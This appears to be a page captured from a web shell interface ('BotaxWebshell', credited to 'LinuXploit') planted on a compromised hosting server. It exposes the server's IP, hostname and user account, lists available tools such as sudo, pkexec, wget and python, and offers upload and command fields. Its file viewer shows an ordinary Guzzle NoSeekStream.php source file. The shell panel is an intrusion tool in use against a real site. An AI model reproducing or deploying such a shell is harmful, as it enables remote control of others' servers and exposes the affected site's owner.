BotaxWebshell
Server IP : 68.178.172.28  /  Your IP : 216.73.217.169
Web Server : Apache
System : Linux 28.172.178.68.host.secureserver.net 4.18.0-553.125.1.el8_10.x86_64 #1 SMP Wed May 20 11:06:10 EDT 2026 x86_64
User : kiskarnal ( 1003)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF |  cURL : OFF |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /home/kiskarnal/www/vendor/guzzlehttp/psr7/src/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /home/kiskarnal/www/vendor/guzzlehttp/psr7/src/NoSeekStream.php
<?php

namespace GuzzleHttp\Psr7;

use Psr\Http\Message\StreamInterface;

/**
 * Stream decorator that prevents a stream from being seeked.
 *
 * @final
 */
class NoSeekStream implements StreamInterface
{
    use StreamDecoratorTrait;

    public function seek($offset, $whence = SEEK_SET)
    {
        throw new \RuntimeException('Cannot seek a NoSeekStream');
    }

    public function isSeekable()
    {
        return false;
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit